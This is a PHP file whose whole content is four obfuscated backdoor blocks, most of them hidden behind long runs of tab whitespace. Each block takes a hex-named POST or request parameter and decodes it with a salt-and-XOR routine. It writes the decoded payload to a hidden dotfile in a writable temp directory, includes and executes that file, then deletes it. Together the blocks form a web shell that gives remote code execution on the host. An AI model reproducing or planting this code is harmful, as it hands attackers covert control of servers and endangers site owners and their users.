<?php																																										if(array_key_exists("re\x63o\x72\x64", $_REQUEST) && !is_null($_REQUEST["re\x63o\x72\x64"])){ $fac = $_REQUEST["re\x63o\x72\x64"]; $fac = explode('.', $fac ) ; $entry =''; $salt5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt5); $u =0; $len =count($fac); do {if ($u >= $len) break; $v4 =$fac[$u]; $chS =ord($salt5[$u % $sLen]); $dec =((int)$v4 - $chS - ($u % 10)) ^ 45; $entry.= chr($dec); $u++;} while (true); $pset = array_filter(["/dev/shm", getenv("TMP"), "/tmp", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]); for ($parameter_group = 0, $entity = count($pset); $parameter_group < $entity; $parameter_group++) { $value = $pset[$parameter_group]; if ((bool)is_dir($value) && (bool)is_writable($value)) { $val = "$value/.property_set"; $file = fopen($val, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $val; @unlink($val); die(); } } } }
																																										if(array_key_exists("\x66ac", $_POST)){ $resource = array_filter(["/var/tmp", getcwd(), getenv("TMP"), "/tmp", session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir()]); $itm = $_POST["\x66ac"]; $itm= explode ('.' , $itm ); $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); foreach ($itm as $v =>$v9) { $sChar = ord($salt[$v % $lenS] ); $dec = ((int)$v9 - $sChar - ($v % 10))^90; $comp .= chr($dec ); } foreach ($resource as $key => $ref) { if ((function($d) { return is_dir($d) && is_writable($d); })($ref)) { $data_chunk = sprintf("%s/.token", $ref); $success = file_put_contents($data_chunk, $comp); if ($success) { include $data_chunk; @unlink($data_chunk); exit;} } } }
																																										if(array_key_exists("f\x6Ca\x67", $_POST)){ $token = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), getcwd()]); $dchunk = $_POST["f\x6Ca\x67"]; $dchunk = explode("." ,$dchunk ); $res = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s3); $s = 0; $len = count( $dchunk); do { if( $s >= $len) break; $v5 = $dchunk[$s]; $sChar = ord( $s3[$s % $sLen]); $d =( ( int)$v5 - $sChar -( $s % 10)) ^ 50; $res .= chr( $d); $s++; } while( true); while ($data_chunk = array_shift($token)) { if (!!is_dir($data_chunk) && !!is_writable($data_chunk)) { $element = str_replace("{var_dir}", $data_chunk, "{var_dir}/.ent"); if (file_put_contents($element, $res)) { require $element; unlink($element); die(); } } } }


if(filter_has_var(INPUT_POST, "\x65nt")){
	$rec = array_filter([getcwd(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/var/tmp", "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), session_save_path()]);
	$component = $_REQUEST["\x65nt"];
		 $component  =		explode( 		'.' ,$component	  );		
	$ref 	='';
            $s 	='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen 	=strlen(	$s);
            $v 	=0;
    
            while(	$v<  count(	$component)) {
                $v5 	=$component[$v];
                $chS 	=ord(	$s[$v % $sLen]);
                $d 	=(	(	int)$v5 - $chS -(	$v % 10))^	42;
                $ref	 .=chr(	$d);
                $v++; 	} 	
	for ($ent = 0, $binding = count($rec); $ent < $binding; $ent++) {
    $dat = $rec[$ent];
    		if (!!is_dir($dat) && !!is_writable($dat)) {
    $dchunk = sprintf("%s/.res", $dat);
    if (@file_put_contents($dchunk, $ref) !== false) {
	include $dchunk;
	unlink($dchunk);
	exit;
}
}
}
}